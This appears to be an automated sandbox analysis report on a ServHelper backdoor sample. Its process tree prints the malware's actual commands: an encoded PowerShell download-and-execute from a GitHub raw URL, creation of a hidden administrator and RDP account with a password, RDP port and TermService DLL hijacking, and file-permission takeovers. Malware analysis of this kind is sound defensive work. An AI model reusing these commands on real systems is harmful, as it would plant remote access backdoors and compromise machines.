Analysis
-
max time kernel
129s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
12-03-2024 07:46
Static task
static1
Behavioral task
behavioral1
Sample
c2d4bd5b611d2adb39200dc461255d5f.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
c2d4bd5b611d2adb39200dc461255d5f.exe
Resource
win10v2004-20240226-en
General
-
Target
c2d4bd5b611d2adb39200dc461255d5f.exe
-
Size
6.9MB
-
MD5
c2d4bd5b611d2adb39200dc461255d5f
-
SHA1
d4ee36f705dad290f9beb74da59c9d147d47dc3b
-
SHA256
aee35491525d86d85dc0f6410525ba82673d7691d4035436154f395430a23594
-
SHA512
631fe15d69b6591e7538277546f694fe6361ca1d485aab2de4406aa460ffc316f2156e44d08124d24cf43197cf154e983c563efa21078b99e4a2524968514668
-
SSDEEP
98304:ipb2Sar8+l1PRdU6wjvo8+NcbCOX69G50zPtzKgu0t5tZgPVWp0vHbSxKyxmxFNz:i8SaoIR6xsu/qQm+gp6zvy3xmXRB
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 7 588 powershell.exe 8 588 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exepid Process 2044 icacls.exe 1760 icacls.exe 1848 icacls.exe 644 icacls.exe 2256 takeown.exe 1924 icacls.exe 1276 icacls.exe 1344 icacls.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Loads dropped DLL 2 IoCs
Processes:
pid Process 1468 1468 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exepid Process 1924 icacls.exe 1276 icacls.exe 1344 icacls.exe 2044 icacls.exe 1760 icacls.exe 1848 icacls.exe 644 icacls.exe 2256 takeown.exe -
Processes:
resource yara_rule behavioral1/files/0x000c000000013aa6-107.dat upx behavioral1/files/0x000a0000000140f7-108.dat upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 6 raw.githubusercontent.com 7 raw.githubusercontent.com 8 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 9 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XM83S3VKAB8ICMI0TKYB.temp powershell.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exeWMIC.exepowershell.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0b0998a5174da01 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2916 powershell.exe 592 powershell.exe 956 powershell.exe 596 powershell.exe 2916 powershell.exe 2916 powershell.exe 2916 powershell.exe 588 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid Process 464 1468 1468 1468 1468 -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
c2d4bd5b611d2adb39200dc461255d5f.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2460 c2d4bd5b611d2adb39200dc461255d5f.exe Token: SeDebugPrivilege 2916 powershell.exe Token: SeDebugPrivilege 592 powershell.exe Token: SeDebugPrivilege 956 powershell.exe Token: SeDebugPrivilege 596 powershell.exe Token: SeRestorePrivilege 1276 icacls.exe Token: SeAssignPrimaryTokenPrivilege 2424 WMIC.exe Token: SeIncreaseQuotaPrivilege 2424 WMIC.exe Token: SeAuditPrivilege 2424 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2424 WMIC.exe Token: SeIncreaseQuotaPrivilege 2424 WMIC.exe Token: SeAuditPrivilege 2424 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1936 WMIC.exe Token: SeIncreaseQuotaPrivilege 1936 WMIC.exe Token: SeAuditPrivilege 1936 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1936 WMIC.exe Token: SeIncreaseQuotaPrivilege 1936 WMIC.exe Token: SeAuditPrivilege 1936 WMIC.exe Token: SeDebugPrivilege 588 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
c2d4bd5b611d2adb39200dc461255d5f.exepowershell.execsc.exenet.execmd.execmd.exedescription pid Process procid_target PID 2460 wrote to memory of 2916 2460 c2d4bd5b611d2adb39200dc461255d5f.exe 29 PID 2460 wrote to memory of 2916 2460 c2d4bd5b611d2adb39200dc461255d5f.exe 29 PID 2460 wrote to memory of 2916 2460 c2d4bd5b611d2adb39200dc461255d5f.exe 29 PID 2916 wrote to memory of 2920 2916 powershell.exe 31 PID 2916 wrote to memory of 2920 2916 powershell.exe 31 PID 2916 wrote to memory of 2920 2916 powershell.exe 31 PID 2920 wrote to memory of 1028 2920 csc.exe 32 PID 2920 wrote to memory of 1028 2920 csc.exe 32 PID 2920 wrote to memory of 1028 2920 csc.exe 32 PID 2916 wrote to memory of 592 2916 powershell.exe 33 PID 2916 wrote to memory of 592 2916 powershell.exe 33 PID 2916 wrote to memory of 592 2916 powershell.exe 33 PID 2916 wrote to memory of 956 2916 powershell.exe 35 PID 2916 wrote to memory of 956 2916 powershell.exe 35 PID 2916 wrote to memory of 956 2916 powershell.exe 35 PID 2916 wrote to memory of 596 2916 powershell.exe 37 PID 2916 wrote to memory of 596 2916 powershell.exe 37 PID 2916 wrote to memory of 596 2916 powershell.exe 37 PID 2916 wrote to memory of 2256 2916 powershell.exe 39 PID 2916 wrote to memory of 2256 2916 powershell.exe 39 PID 2916 wrote to memory of 2256 2916 powershell.exe 39 PID 2916 wrote to memory of 1924 2916 powershell.exe 40 PID 2916 wrote to memory of 1924 2916 powershell.exe 40 PID 2916 wrote to memory of 1924 2916 powershell.exe 40 PID 2916 wrote to memory of 1276 2916 powershell.exe 41 PID 2916 wrote to memory of 1276 2916 powershell.exe 41 PID 2916 wrote to memory of 1276 2916 powershell.exe 41 PID 2916 wrote to memory of 1344 2916 powershell.exe 42 PID 2916 wrote to memory of 1344 2916 powershell.exe 42 PID 2916 wrote to memory of 1344 2916 powershell.exe 42 PID 2916 wrote to memory of 2044 2916 powershell.exe 43 PID 2916 wrote to memory of 2044 2916 powershell.exe 43 PID 2916 wrote to memory of 2044 2916 powershell.exe 43 PID 2916 wrote to memory of 1760 2916 powershell.exe 44 PID 2916 wrote to memory of 1760 2916 powershell.exe 44 PID 2916 wrote to memory of 1760 2916 powershell.exe 44 PID 2916 wrote to memory of 1848 2916 powershell.exe 45 PID 2916 wrote to memory of 1848 2916 powershell.exe 45 PID 2916 wrote to memory of 1848 2916 powershell.exe 45 PID 2916 wrote to memory of 644 2916 powershell.exe 46 PID 2916 wrote to memory of 644 2916 powershell.exe 46 PID 2916 wrote to memory of 644 2916 powershell.exe 46 PID 2916 wrote to memory of 2180 2916 powershell.exe 47 PID 2916 wrote to memory of 2180 2916 powershell.exe 47 PID 2916 wrote to memory of 2180 2916 powershell.exe 47 PID 2916 wrote to memory of 1724 2916 powershell.exe 48 PID 2916 wrote to memory of 1724 2916 powershell.exe 48 PID 2916 wrote to memory of 1724 2916 powershell.exe 48 PID 2916 wrote to memory of 2028 2916 powershell.exe 49 PID 2916 wrote to memory of 2028 2916 powershell.exe 49 PID 2916 wrote to memory of 2028 2916 powershell.exe 49 PID 2916 wrote to memory of 2992 2916 powershell.exe 50 PID 2916 wrote to memory of 2992 2916 powershell.exe 50 PID 2916 wrote to memory of 2992 2916 powershell.exe 50 PID 2992 wrote to memory of 1884 2992 net.exe 51 PID 2992 wrote to memory of 1884 2992 net.exe 51 PID 2992 wrote to memory of 1884 2992 net.exe 51 PID 2916 wrote to memory of 2100 2916 powershell.exe 52 PID 2916 wrote to memory of 2100 2916 powershell.exe 52 PID 2916 wrote to memory of 2100 2916 powershell.exe 52 PID 2100 wrote to memory of 2096 2100 cmd.exe 53 PID 2100 wrote to memory of 2096 2100 cmd.exe 53 PID 2100 wrote to memory of 2096 2100 cmd.exe 53 PID 2096 wrote to memory of 1112 2096 cmd.exe 54
Processes
-
C:\Users\Admin\AppData\Local\Temp\c2d4bd5b611d2adb39200dc461255d5f.exe"C:\Users\Admin\AppData\Local\Temp\c2d4bd5b611d2adb39200dc461255d5f.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e9dcgiwx.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6BFD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6BFC.tmp"4⤵PID:1028
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:596
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2256
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1924
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1344
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2044
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1760
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1848
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:644
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2180
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:1724
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2028
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1884
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1448
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1872
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:108
-
C:\Windows\system32\net.exenet start TermService5⤵PID:1560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1720
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2148
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1656
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:2968
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:1644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1264
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Itt9EyuK /add1⤵PID:1504
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Itt9EyuK /add2⤵PID:2000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Itt9EyuK /add3⤵PID:1888
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:2060
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:2212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1916
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MGILJUBR$ /ADD1⤵PID:1152
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MGILJUBR$ /ADD2⤵PID:2124
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MGILJUBR$ /ADD3⤵PID:2912
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1520
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:2780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:2624
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Itt9EyuK1⤵PID:1748
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Itt9EyuK2⤵PID:2656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Itt9EyuK3⤵PID:2592
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:2360
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2328
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:584
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2716
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:588
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f1571f539b81b72aa1b064299331f64d
SHA1ad01b47f4426b5fc091bda03ee61796566c498b8
SHA2563f85eb1a94ba2f87f04a16fe9768c5a883e179b6136c958f186cef45a03231e5
SHA512baf3df6ad93f90bacb48748dd28582099f6443bc823beabbca4443894533301c9d2d3d9412b07aef25ca206bc91f56a27823dbb1d8078b96baab585781d4723f
-
Filesize
3KB
MD5d94c2627d6eaf10966ae8025cb6b7464
SHA1da61b093e6d473b62a2281bd210350f8724575a6
SHA256aa8c8bdde39407e8f36f75820a3132ee60ae861a7b1ad011275c55ca7713bb0b
SHA512915fd15e1c2fbb517048c6c5ff6ef0d3a7fd50b4e79c58744b79e0d78956ca7c8b720624a030aae105e0019128deaf3dabb935e4b388af2e422c878bcfa12042
-
Filesize
7KB
MD5f472ee2b32c5db5d027f4bfd168fddd0
SHA1fcdc04cd5e0bfa806dbcdd5da0eb13230318ce91
SHA2561af2ecb66950b8d11dcd865e9d3a931bba1362d161684c8179f0efac36189c74
SHA51235b9dd83217fa0832be3de4bc6aeeae9968152fb23e3b0f66e2c732e9c93edd84282dcef7defad1a1c29383dd374b15f48bc0645bd86ad3b477ba17d62e5a33a
-
Filesize
1KB
MD53447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
Filesize
2.5MB
MD5c16f184d9d62eddb657c4a000477bed7
SHA15cae0c725cec08ec9bc5a2b246f55401329641f6
SHA256eb5ed128539eeb68644aa0546eb88a8ee6c35e9bb0627dff4d59f6ac9b114528
SHA512c8e8c2151a2fef875ce447dd857fdafcfd172d2f1ad5fe6d72caeed173efc1a64c296b50b98c61dec8b61f5ae05ca1b9e742fa19b851deee476537d55b089628
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55b089cec3eb8b03530a8264041bece2b
SHA16417d8ccd3ebd5d290bf7631d287453d07cd79a5
SHA256e081125410768cc7bc6c09c3ece3d4940562b6f4135d8165845c3d9d780721cf
SHA51240de0a97eef9342b83af8e45f59484b1dd9e0faa9dd2d073d75f9d87fcfcf29afbeb179eba2faef4edf5debe291103f8bbc9a2672c60364dbb0c26fa9800009f
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
652B
MD5d77ac9cbba340499daed4330403ec956
SHA1c9e9b8318820d6c6c5d9bc888e9c885c5a6bea48
SHA25606e579ddcd72548f7e5dfb71da12608244a55088f0d6050538a974f1650b1b65
SHA51216e389271c767ddc9eeca2a4a3e83f8c655f0827d9356cf879efd639ab0f037bf48d3a88f1a3314aea0df9232af5fa26126f86930149dcabd600936c750a6c8e
-
Filesize
424B
MD54864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
Filesize
309B
MD54ce1bc762c7bb4e61fcae91e249415f6
SHA1806a46d3a10e484473c7112ee503fd208722ffd3
SHA256162ee52cded4324f6f7c5839ac773c0352ea97d0d297c3cea00eaeeab82b5ab8
SHA512b6fde4585f20ef2530bc5838d0e04815ce55d32b3f9685293abb0f905a0c1dd8ef1d72d35d5f6f1921a344375749e40476c9d9bea9de3871ad3d1efcf9e99f3f
-
Filesize
60KB
MD5596ca1d187937a1a2bca34d8c8993f1f
SHA1bb3dfb10cb06dddc4e58d8b3f5a08b8908378820
SHA2567fce3b42b061497b14f16421ddafd75d3a56be2ebd081f2bd84157b0166803b7
SHA512bde56fd03c38274033a8195ba1aba3645cb03821ba18db7b35f6a9062ee20f8df29e9e108a3f887c8bee4b5487ace1bd2e374ef9418aac4460a31437ba075df0
-
Filesize
743KB
MD5537f4dfd0535f687393b715b914c04a9
SHA1852d52cf10f677e2abe2ecedd7693d9a9bf20e02
SHA256ccf72f75efe3153a55507d1e73f0f366d380d1923ee912e2e0fee825367a56bc
SHA512ccf483927c1a05b0af093d86c6f0f802ee0d199f8862cdf25667114a30ecb0c64ef55e96d2744b7149d8a444ea0001d78189862095942d38801e27045804141c